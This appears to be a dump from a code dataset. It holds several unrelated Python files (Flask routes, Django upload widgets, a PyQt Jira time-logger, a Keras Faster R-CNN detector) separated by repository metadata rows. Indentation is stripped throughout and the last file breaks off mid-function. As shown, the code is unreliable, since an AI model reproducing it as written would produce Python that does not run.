@login_required
def update_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
form = VisitorUpdateForm()
if form.validate_on_submit():
post.visitor_name = form.visitor_name.data
post.student_name = form.student_name.data
post.grade = form.grade.data
post.reason = form.reason.data
post.reason_other = form.reason_other.data
post.direction = form.direction.data
db.session.commit()
flash("Your post has been updated.", 'success')
return redirect(url_for('visitor_logs.daily_summary'))
# Pre-populate the form
elif request.method == 'GET':
form.visitor_name.data = post.visitor_name
form.student_name.data = post.student_name
form.grade.data = post.grade
form.reason.data = post.reason
form.reason_other.data = post.reason_other
form.direction.data = post.direction
return render_template('visitor-update.html', title="Update Entry", post=post, form=form)
# A route to delete a specific post for visitor
@visitor_logs.route('/visitor-signin/<int:post_id>/delete', methods=['POST'])
@login_required
def delete_visitor_signin(post_id):
post = VisitorLog.query.get_or_404(post_id)
db.session.delete(post)
db.session.commit()
flash('The entry has been deleted.', category='success')
return redirect(url_for('visitor_logs.daily_summary')) | 48.692737 | 226 | 0.723726 | 0 | 0 | 0 | 0 | 7,736 | 0.887563 | 0 | 0 | 2,555 | 0.293139 |
a4ea3d61587577e8897b867e636a3cccaeb49674 | 1,657 | py | Python | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 15 | 2020-03-27T20:48:07.000Z | 2022-01-21T09:47:14.000Z | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 1 | 2020-11-13T16:04:56.000Z | 2020-11-13T16:04:56.000Z | abstract_model.py | mandt-lab/adversarial-negative-sampling | a71a9bd8e814b132ec094bd2c5d080edcb1bccad | [
"MIT"
] | 4 | 2020-02-23T02:21:45.000Z | 2020-09-29T03:07:54.000Z | import sys
import abc
import tensorflow as tf
import numpy as np
import optimizer
class AbstractModel(abc.ABC):
'''Abstract base class for knowledge graph embedding models.
You won't usually want to derive directly from this class. In most cases, you'll
want to derive from either `AbstractMainModel` or from `AbstractAuxModel`.
'''
@abc.abstractmethod
def unnormalized_score(self, emb_in_e, emb_r, emb_all_e, args):
'''Define a tensorflow op that calculates the prediction scores (logits).
This is also sometimes called `logits`.
Arguments:
emb_in_e -- Embedding vectors of the input entities, i.e., the entities on which
we condition. A dict that maps labels (strings) to tensors of shape
`(minibatch_size, num_samples, embedding_dimensions...)`.
emb_r -- Embedding vectors of the relations. If reciprocal relations are used
then the caller should pass in different embedding vectors for head or tail
prediction. A dict that maps labels (strings) to tensors of shape
`(minibatch_size, num_samples, embedding_dimensions...)`.
emb_all_e -- Embedding vectors of all entities. A dict that maps labels (strings)
to tensors of shape `(range_e, num_samples, embedding_dimensions...)`.
args -- Namespace holding command line arguments.
Returns:
A tensor of shape `(num_samples, minibatch_size, range_e)` that holds the
unnormalized represents the negative log likelihood of the data.
Should *not* be normalized to the batch size or sample size.
'''
pass
| 40.414634 | 89 | 0.689801 | 1,570 | 0.947495 | 0 | 0 | 1,297 | 0.78274 | 0 | 0 | 1,421 | 0.857574 |
a4ea59238b7b0825e3fc20672e4667b0dd688bec | 165 | py | Python | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 114 | 2015-01-19T14:15:07.000Z | 2022-02-22T01:47:19.000Z | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 15 | 2016-02-11T09:09:02.000Z | 2021-04-05T12:57:09.000Z | fnss/traffic/__init__.py | brucespang/fnss | 8e1d95744347afa77383092e6f144980d84e222d | [
"BSD-2-Clause"
] | 36 | 2015-02-08T12:28:04.000Z | 2021-11-19T06:08:17.000Z | """Tools for creating and manipulating event schedules and traffic matrices"""
from fnss.traffic.eventscheduling import *
from fnss.traffic.trafficmatrices import *
| 41.25 | 78 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.472727 |
a4eac09718b988218fe43f31996cb5b72933482b | 687 | py | Python | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | sphinxviewer/main.py | badisa/sphinx-viewer | 484c74f9f407aa6bb36fb95dfd1f3a56e1942dfe | [
"MIT"
] | null | null | null | import os
import sys
from argparse import ArgumentParser
from sphinxviewer.sphinx import build_html
from sphinxviewer.server import serve_server
def main():
parser = ArgumentParser(description="Live editing sphinx doc server")
# parser.add_argument("-p", "--port", default=8888, help="Port to run server on")
# parser.add_argument("-d", "--build-dir", default="_build", help="Build directory")
_ = parser.parse_args()
print("Building initial docs")
# TODO Parameterize source and build directories. Currently follows
# the defaults for sphinx.
success = build_html(os.getcwd(), "_build")
if not success:
sys.exit(1)
serve_server(8888)
| 31.227273 | 88 | 0.71179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.467249 |
a4eb0fd565d81e7a6f39564ab37c7ad1acd391aa | 4,338 | py | Python | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 941 | 2015-01-01T18:17:43.000Z | 2022-02-26T07:45:40.000Z | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 228 | 2015-01-11T16:36:34.000Z | 2022-03-11T23:17:15.000Z | djng/forms/widgets.py | ParikhKadam/django-angular | 1fdd2ab3211ed1655acc2d172d826ed7f3ad0574 | [
"MIT"
] | 294 | 2015-01-04T09:01:33.000Z | 2022-02-26T07:45:41.000Z | import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
# add a spinnging wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
| 40.166667 | 110 | 0.611803 | 3,968 | 0.914707 | 0 | 0 | 0 | 0 | 0 | 0 | 807 | 0.18603 |
a4ec750dd9642849d8795ee448336dfcac80d1cf | 347 | py | Python | chapter2/wok/develop/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | 1 | 2015-12-22T00:53:18.000Z | 2015-12-22T00:53:18.000Z | chapter2/wok/master/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | null | null | null | chapter2/wok/master/examples/multiport/sum.py | chris-zen/phd-thesis | 1eefdff8e7ca1910304e27ae42551dc64496b101 | [
"Unlicense"
] | null | null | null | from wok.task import task
@task.main()
def main():
values, count_port, sum_port = task.ports("x", "count", "sum")
count = 0
sum = 0
for v in values:
task.logger.info("value = {0}".format(v))
count += 1
sum += v
task.logger.info("Sum of {0} numbers = {1}".format(count, sum))
count_port.send(count)
sum_port.send(sum)
task.run()
| 16.52381 | 64 | 0.634006 | 0 | 0 | 0 | 0 | 307 | 0.884726 | 0 | 0 | 54 | 0.15562 |
a4ed98ab3c23c6597228e8de2632140feeb4c5d4 | 2,961 | py | Python | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | climateapp/climateapp/routes.py | mpasricha1/sqlalchemy-challenge | 94a679cee2da1f7942f89dfcc50e7c4d6adc5e96 | [
"ADSL"
] | null | null | null | from flask import jsonify, render_template
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
import datetime as dt
from climateapp import app
engine = create_engine('sqlite:///../Resources/hawaii.sqlite')
Base = automap_base()
Base.prepare(engine,reflect=True)
Measurements = Base.classes.measurement
Stations = Base.classes.station
@app.route('/')
def home():
return render_template('index.html')
@app.route('/api/v1.0/precipitation')
def perciptation():
session = Session(engine)
lastDate = session.query(Measurements.date).order_by(Measurements.date.desc()).first()
for row in lastDate:
date = dt.datetime.strptime(row,"%Y-%m-%d")
sel = [Measurements.date,
func.sum(Measurements.prcp)]
data = session.query(*sel).filter(func.strftime("%Y-%m-%d)", Measurements.date) >= str((date - dt.timedelta(days=365)))).\
group_by(Measurements.date).all()
session.close()
returnList = []
for row in data:
dateDict = {}
dateDict["date"] = row.date
dateDict["prcp"] = row[1]
returnList.append(dateDict)
return jsonify(returnList)
@app.route('/api/v1.0/stations')
def stations():
session = Session(engine)
data = session.query(Stations.station, Stations.name).all()
session.close()
returnList = []
for row in data:
stationDict = {}
stationDict["station"] = row.station
stationDict["name"] = row.name
returnList.append(stationDict)
return jsonify(returnList)
@app.route('/api/v1.0/tobs')
def tobs():
session = Session(engine)
sel = [Stations.station,
func.count(Measurements.station)]
rankedStations = session.query(*sel).filter(Measurements.station == Stations.station).\
group_by(Measurements.station).order_by(func.count(Measurements.station).desc()).first()
for row in rankedStations:
bestId = rankedStations.station
sel = [Stations.station,
func.min(Measurements.tobs),
func.max(Measurements.tobs),
func.avg(Measurements.tobs)
]
data = session.query(*sel).\
filter(Measurements.station == Stations.station).\
filter(Stations.station == bestId).all()
session.close()
returnList = []
for row in data:
tobsDict = {}
tobsDict["station"] = row.station
tobsDict["min"] = row[1]
tobsDict["max"] = row[2]
tobsDict["avg"] = row[3]
returnList.append(tobsDict)
return jsonify(returnList)
@app.route('/api/v1.0/<start>')
def start(start):
session = Session(engine)
data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
filter(Measurements.date >= start).all()
return jsonify(data)
@app.route('/api/v1.0/<start>/<end>')
def dateRange(start,end):
session = Session(engine)
data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
filter(Measurements.date >= start).\
filter(Measurements.date <= end).all()
return jsonify(data) | 26.4375 | 123 | 0.712597 | 0 | 0 | 0 | 0 | 2,520 | 0.851064 | 0 | 0 | 230 | 0.077676 |
a4ef4d853adb1eeb401e5c0eff70d44d9f924121 | 9,443 | py | Python | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import json
import io
import sys
import traceback
import webbrowser
from contextlib import redirect_stdout
from datetime import datetime
from PyQt5.Qt import (
QApplication, QMessageBox, QThread, pyqtSignal, QMainWindow, QPushButton, QCheckBox, QPlainTextEdit,
QVBoxLayout, QHBoxLayout, QTextOption, QTableWidget, QWidget, QSizePolicy, QSplitter, Qt, QTableWidgetItem,
QProgressDialog, QHeaderView, QSystemTrayIcon, QIcon, QEvent, QTimer
)
from main import (
DIR, get_rss_jira_log, parse_logged_dict, get_logged_list_by_now_utc_date, get_logged_total_seconds,
get_sorted_logged, seconds_to_str
)
def log_uncaught_exceptions(ex_cls, ex, tb):
text = f'{ex_cls.__name__}: {ex}:\n'
text += ''.join(traceback.format_tb(tb))
print(text)
QMessageBox.critical(None, 'Error', text)
sys.exit(1)
sys.excepthook = log_uncaught_exceptions
class RunFuncThread(QThread):
run_finished = pyqtSignal(object)
def __init__(self, func):
super().__init__()
self.func = func
def run(self):
self.run_finished.emit(self.func())
WINDOW_TITLE = 'parse_jira_logged_time'
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle(WINDOW_TITLE)
file_name = str(DIR / 'favicon.ico')
icon = QIcon(file_name)
self.setWindowIcon(icon)
self.tray = QSystemTrayIcon(icon)
self.tray.setToolTip(self.windowTitle())
self.tray.activated.connect(self._on_tray_activated)
self.tray.show()
self.logged_dict = dict()
self.pb_refresh = QPushButton('REFRESH')
self.pb_refresh.clicked.connect(self.refresh)
self.cb_show_log = QCheckBox()
self.cb_show_log.setChecked(True)
self.log = QPlainTextEdit()
self.log.setReadOnly(True)
self.log.setWordWrapMode(QTextOption.NoWrap)
log_font = self.log.font()
log_font.setFamily('Courier New')
self.log.setFont(log_font)
self.cb_show_log.clicked.connect(self.log.setVisible)
self.log.setVisible(self.cb_show_log.isChecked())
header_labels = ['DATE', 'TOTAL LOGGED TIME']
self.table_logged = QTableWidget()
self.table_logged.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged.setColumnCount(len(header_labels))
self.table_logged.setHorizontalHeaderLabels(header_labels)
self.table_logged.horizontalHeader().setStretchLastSection(True)
self.table_logged.itemClicked.connect(self._on_table_logged_item_clicked)
header_labels = ['TIME', 'LOGGED', 'JIRA']
self.table_logged_info = QTableWidget()
self.table_logged_info.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged_info.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged_info.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged_info.setColumnCount(len(header_labels))
self.table_logged_info.setHorizontalHeaderLabels(header_labels)
self.table_logged_info.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
self.table_logged_info.horizontalHeader().setStretchLastSection(True)
self.table_logged_info.itemDoubleClicked.connect(self._on_table_logged_info_item_double_clicked)
main_layout = QVBoxLayout()
central_widget = QWidget()
central_widget.setLayout(main_layout)
self.setCentralWidget(central_widget)
self.pb_refresh.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred))
h_layout = QHBoxLayout()
h_layout.addWidget(self.pb_refresh)
h_layout.addWidget(self.cb_show_log)
layout_table_widget = QVBoxLayout()
layout_table_widget.setContentsMargins(0, 0, 0, 0)
layout_table_widget.addWidget(self.table_logged)
layout_table_widget.addWidget(self.table_logged_info)
table_widget = QWidget()
table_widget.setLayout(layout_table_widget)
splitter = QSplitter(Qt.Horizontal)
splitter.addWidget(table_widget)
splitter.addWidget(self.log)
main_layout.addLayout(h_layout)
main_layout.addWidget(splitter)
def _fill_tables(self, xml_data: bytes):
buffer_io = io.StringIO()
try:
with redirect_stdout(buffer_io):
print(len(xml_data), repr(xml_data[:50]))
# Структура документа -- xml
self.logged_dict = parse_logged_dict(xml_data)
print(self.logged_dict)
if not self.logged_dict:
return
print(json.dumps(self.logged_dict, indent=4, ensure_ascii=False))
print()
logged_list = get_logged_list_by_now_utc_date(self.logged_dict)
logged_total_seconds = get_logged_total_seconds(logged_list)
logged_total_seconds_str = seconds_to_str(logged_total_seconds)
print('entry_logged_list:', logged_list)
print('today seconds:', logged_total_seconds)
print('today time:', logged_total_seconds_str)
print()
# Для красоты выводим результат в табличном виде
lines = []
# Удаление строк таблицы
while self.table_logged.rowCount():
self.table_logged.removeRow(0)
for i, (date_str, logged_list) in enumerate(get_sorted_logged(self.logged_dict)):
total_seconds = get_logged_total_seconds(logged_list)
total_seconds_str = seconds_to_str(total_seconds)
row = date_str, total_seconds_str, total_seconds
lines.append(row)
self.table_logged.setRowCount(self.table_logged.rowCount() + 1)
self.table_logged.setItem(i, 0, QTableWidgetItem(date_str))
item = QTableWidgetItem(total_seconds_str)
item.setToolTip('Total seconds: {}'.format(total_seconds))
self.table_logged.setItem(i, 1, item)
self.table_logged.setCurrentCell(0, 0)
self.table_logged.setFocus()
self._on_table_logged_item_clicked(self.table_logged.currentItem())
# Список строк станет списком столбцов, у каждого столбца подсчитается максимальная длина
max_len_columns = [max(map(len, map(str, col))) for col in zip(*lines)]
# Создание строки форматирования: [30, 14, 5] -> "{:<30} | {:<14} | {:<5}"
my_table_format = ' | '.join('{:<%s}' % max_len for max_len in max_len_columns)
for line in lines:
print(my_table_format.format(*line))
finally:
text = buffer_io.getvalue()
self.log.setPlainText(text)
print(text)
def refresh(self):
progress_dialog = QProgressDialog(self)
thread = RunFuncThread(func=get_rss_jira_log)
thread.run_finished.connect(self._fill_tables)
thread.run_finished.connect(progress_dialog.close)
thread.start()
progress_dialog.setWindowTitle('Please wait...')
progress_dialog.setLabelText(progress_dialog.windowTitle())
progress_dialog.setRange(0, 0)
progress_dialog.exec()
self.setWindowTitle(WINDOW_TITLE + ". Last refresh date: " + datetime.now().strftime('%d/%m/%Y %H:%M:%S'))
def _on_table_logged_item_clicked(self, item: QTableWidgetItem):
# Удаление строк таблицы
while self.table_logged_info.rowCount():
self.table_logged_info.removeRow(0)
row = item.row()
date_str = self.table_logged.item(row, 0).text()
logged_list = self.logged_dict[date_str]
logged_list = reversed(logged_list)
for i, logged in enumerate(logged_list):
self.table_logged_info.setRowCount(self.table_logged_info.rowCount() + 1)
self.table_logged_info.setItem(i, 0, QTableWidgetItem(logged['time']))
self.table_logged_info.setItem(i, 1, QTableWidgetItem(logged['logged_human_time']))
item = QTableWidgetItem(logged['jira_id'])
item.setToolTip(logged['jira_title'])
self.table_logged_info.setItem(i, 2, item)
def _on_table_logged_info_item_double_clicked(self, item: QTableWidgetItem):
row = item.row()
jira_id = self.table_logged_info.item(row, 2).text()
url = 'https://jira.compassplus.ru/browse/' + jira_id
webbrowser.open(url)
def _on_tray_activated(self, reason):
self.setVisible(not self.isVisible())
if self.isVisible():
self.showNormal()
self.activateWindow()
def changeEvent(self, event: QEvent):
if event.type() == QEvent.WindowStateChange:
# Если окно свернули
if self.isMinimized():
# Прячем окно с панели задач
QTimer.singleShot(0, self.hide)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.resize(1200, 800)
mw.show()
mw.refresh()
app.exec()
| 34.974074 | 114 | 0.659324 | 8,535 | 0.881442 | 0 | 0 | 0 | 0 | 0 | 0 | 1,004 | 0.103687 |
a4efa6df7bd8bff04aec47fb249d0baf026f7c34 | 10,326 | py | Python | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | 3 | 2020-05-26T15:13:06.000Z | 2020-05-27T02:57:27.000Z | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | null | null | null | fasterRCNN.py | TangZhenchaoTZC/Keras-mask-detection | 325679d06a12a90b2552ed7d447298a23e3b9d57 | [
"MIT"
] | null | null | null | """fasterRCNN对象创建"""
import numpy as np
import colorsys
import os
from keras import backend as K
from keras.applications.imagenet_utils import preprocess_input
from PIL import Image, ImageFont, ImageDraw
import copy
import math
from net import fasterrcnn as frcnn
from net import netconfig as netconfig
from net import RPN as RPN
from net import tools as tools
class FasterRCNN(object):
_defaults = {
"model_path": './model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5',
"classes_path": './model_data/index.txt',
"confidence": 0.7,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
"""初始化faster RCNN"""
self.__dict__.update(self._defaults)
self.class_names = self._get_class()
self.sess = K.get_session()
self.config = netconfig.Config()
self.generate()
self.bbox_util = tools.BBoxUtility()
self.confidence = 0.7
self.classes_path='./model_data/index.txt'
self.model_path='./model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5'
def _get_class(self):
"""获得所有的分类"""
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def generate(self):
"""获得所有的分类"""
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# 计算总的种类
self.num_classes = len(self.class_names) + 1
# 载入模型,如果原来的模型里已经包括了模型结构则直接载入。
# 否则先构建模型再载入
self.model_rpn, self.model_classifier = frcnn.get_predict_model(self.config, self.num_classes)
self.model_rpn.load_weights(self.model_path, by_name=True)
self.model_classifier.load_weights(self.model_path, by_name=True, skip_mismatch=True)
print('{} model, anchors, and classes loaded.'.format(model_path))
# 画框设置不同的颜色
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
def get_img_output_length(self, width, height):
def get_output_length(input_length):
# input_length += 6
filter_sizes = [7, 3, 1, 1]
padding = [3, 1, 0, 0]
stride = 2
for i in range(4):
# input_length = (input_length - filter_size + stride) // stride
input_length = (input_length + 2 * padding[i] - filter_sizes[i]) // stride + 1
return input_length
return get_output_length(width), get_output_length(height)
def detect_image(self, image):
"""检测图片"""
image_shape = np.array(np.shape(image)[0:2])
old_width = image_shape[1]
old_height = image_shape[0]
# 保存原始图片
old_image = copy.deepcopy(image)
# 把图片的最短边resize到600
width, height = tools.get_new_img_size(old_width, old_height)
image = image.resize([width, height])
# 图片转成数组
photo = np.array(image, dtype=np.float64)
# 图片预处理,归一化
photo = preprocess_input(np.expand_dims(photo, 0))
# 使用RPN预测,获得概率x_class和x_regr
preds = self.model_rpn.predict(photo)
# 将预测结果进行解码
# 获得所有先验框
anchors = RPN.create_anchor(self.get_img_output_length(width, height), width, height)
# 解码获得建议框,这里得到了300个建议框,注意其坐标均为0-1间
rpn_results = self.bbox_util.detection_out(preds, anchors, 1, confidence_threshold=0)
# 将返回的0-1的建议框映射到共享特征图,如果特征图为38*38,值域变成0-38之间,R为300行4列,分别是左上角右下角坐标
R = rpn_results[0][:, 2:]
R[:, 0] = np.array(np.round(R[:, 0] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 1] = np.array(np.round(R[:, 1] * height / self.config.rpn_stride), dtype=np.int32)
R[:, 2] = np.array(np.round(R[:, 2] * width / self.config.rpn_stride), dtype=np.int32)
R[:, 3] = np.array(np.round(R[:, 3] * height / self.config.rpn_stride), dtype=np.int32)
print(R)
# R转换一下,前两列是左上角坐标,后两列是宽和高
R[:, 2] -= R[:, 0]
R[:, 3] -= R[:, 1]
base_layer = preds[2]
delete_line = []
for i, r in enumerate(R):
if r[2] < 1 or r[3] < 1:
delete_line.append(i)
R = np.delete(R, delete_line, axis=0)
bboxes = []
probs = []
labels = []
# 分批次遍历建议框,每批32个
for jk in range(R.shape[0] // self.config.num_rois + 1):
# 取出32个建议框
ROIs = np.expand_dims(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :], axis=0)
# 判断建议框是否有效
if ROIs.shape[1] == 0:
break
# 对最后一次整除不全,不能到32个的建议框小批进行填充
if jk == R.shape[0] // self.config.num_rois:
# pad R
curr_shape = ROIs.shape
target_shape = (curr_shape[0], self.config.num_rois, curr_shape[2])
ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
ROIs_padded[:, :curr_shape[1], :] = ROIs
ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
ROIs = ROIs_padded
# 将共享特征层和建议框传入end_classifier进行预测
# P_cls为(Batch_size,32个建议框,21)
# P_regr为(Batch_size,32个建议框,80)
[P_cls, P_regr] = self.model_classifier.predict([base_layer, ROIs])
# 判断输出的每批中每个建议框是否真实包含我们要的物体,本身置信度阈值设置为0.9,如果是背景也要跳过
for ii in range(P_cls.shape[1]):
# P_cls[0, ii, :-1]是21个概率组成的列表
if np.max(P_cls[0, ii, :-1]) < self.confidence or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
continue
# 获得label
label = np.argmax(P_cls[0, ii, :-1])
# 获得坐标信息
(x, y, w, h) = ROIs[0, ii, :]
# 其实就是label
cls_num = np.argmax(P_cls[0, ii, :-1])
# 获取框的信息,并改变数量级
(tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
tx /= self.config.classifier_regr_std[0]
ty /= self.config.classifier_regr_std[1]
tw /= self.config.classifier_regr_std[2]
th /= self.config.classifier_regr_std[3]
# 获取到共享特征层上真实的坐标信息
cx = x + w / 2.
cy = y + h / 2.
cx1 = tx * w + cx
cy1 = ty * h + cy
w1 = math.exp(tw) * w
h1 = math.exp(th) * h
x1 = cx1 - w1 / 2.
y1 = cy1 - h1 / 2.
x2 = cx1 + w1 / 2
y2 = cy1 + h1 / 2
x1 = int(round(x1))
y1 = int(round(y1))
x2 = int(round(x2))
y2 = int(round(y2))
# bboxes是最终从300个建议框过滤出来与目标物体对应的建议框
# 但注意,这里的建议框还是存在重叠现象,因为之前仅仅靠物体置信度来筛选
bboxes.append([x1, y1, x2, y2])
probs.append(np.max(P_cls[0, ii, :-1]))
labels.append(label)
# 没检测到物体,返回
if len(bboxes) == 0:
return old_image
# 将38*38特征层的建议框映射到600*600
# 筛选出其中得分高于confidence的框,因此此时需要再次NMS删除重叠框
labels = np.array(labels)
probs = np.array(probs)
boxes = np.array(bboxes, dtype=np.float32)
boxes[:, 0] = boxes[:, 0] * self.config.rpn_stride / width
boxes[:, 1] = boxes[:, 1] * self.config.rpn_stride / height
boxes[:, 2] = boxes[:, 2] * self.config.rpn_stride / width
boxes[:, 3] = boxes[:, 3] * self.config.rpn_stride / height
results = np.array(
self.bbox_util.nms_for_out(np.array(labels), np.array(probs), np.array(boxes), self.num_classes - 1, 0.4))
top_label_indices = results[:, 0]
top_conf = results[:, 1]
boxes = results[:, 2:]
#top_label_indices=labels
#top_conf=probs
# 大小调整到原图上,此时已经完成了建议框的计算
boxes[:, 0] = boxes[:, 0] * old_width
boxes[:, 1] = boxes[:, 1] * old_height
boxes[:, 2] = boxes[:, 2] * old_width
boxes[:, 3] = boxes[:, 3] * old_height
# simhei.ttf用于设置字体
font = ImageFont.truetype(font='model_data/simhei.ttf',size=np.floor(3e-2 * np.shape(image)[1] + 0.5).astype('int32'))
thickness = (np.shape(old_image)[0] + np.shape(old_image)[1]) // old_width * 2
image = old_image
for i, c in enumerate(top_label_indices):
predicted_class = self.class_names[int(c)]
score = top_conf[i]
left, top, right, bottom = boxes[i]
top = top - 5
left = left - 5
bottom = bottom + 5
right = right + 5
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(np.shape(image)[0], np.floor(bottom + 0.5).astype('int32'))
right = min(np.shape(image)[1], np.floor(right + 0.5).astype('int32'))
# 画框框
